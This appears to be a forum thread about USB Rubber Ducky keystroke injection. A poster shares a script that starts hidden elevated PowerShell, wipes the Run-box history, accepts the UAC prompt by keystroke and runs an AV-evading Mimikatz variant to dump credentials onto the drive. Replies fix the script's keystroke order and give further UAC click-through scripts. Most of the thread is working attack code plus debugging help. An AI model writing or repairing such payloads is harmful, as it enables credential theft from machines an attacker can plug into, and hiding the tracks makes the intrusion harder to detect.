Jump to content

OK i give up i have spent couple of days to try to get this working need help

L07TB0Y

By L07TB0Y
in Classic USB Rubber Ducky

 Share

Recommended Posts

L07TB0Y Newbie

L07TB0Y

Posted
Posted

here is my code 

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y
DELAY 1000
LEFTARROW
DELAY 300
ENTER
DELAY 500
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
DELAY 300
ENTER

 

 

issue 1:

THE UAC is not going away by either ALT Y or LEFTARROW and ENTER but even after this if i click OK manually it does not work 

FILES is the name of rubber ducky 

lb.ps1 is the customized mimi that does not get detected by AV etc 

what am i doing wrong? 

Link to comment
Share on other sites
Guest

Guest

Posted
Posted (edited)

Just from the look of it, the ENTER is at the wrong place

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y

should be

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 1000
ALT Y

Your version might have worked by accident, if the last command the user typed in their run box, was CMD.

 

my advice to you, debug your own scripts by manually executing every line, step by step and see where it goes wrong. Also,  keep in mind that a script designed on one version of Windows, might not work on another. The LEFTARROW and ENTER that follow have no function on my Windows 8.1 box. So when asking for help, tell us the OS you're using.

 

 

 

 

 

 

Edited by Guest
Link to comment
Share on other sites
Guest

Guest

Posted
Posted

regarding the uac screen, try making an extremely easy script and see if any of those successfully bypasses the uac message

DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
ALT Y

or


DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
LEFTARROW
ENTER

or

DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
TAB
TAB
TAB (number of tabs needed to select "yes")
ENTER

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...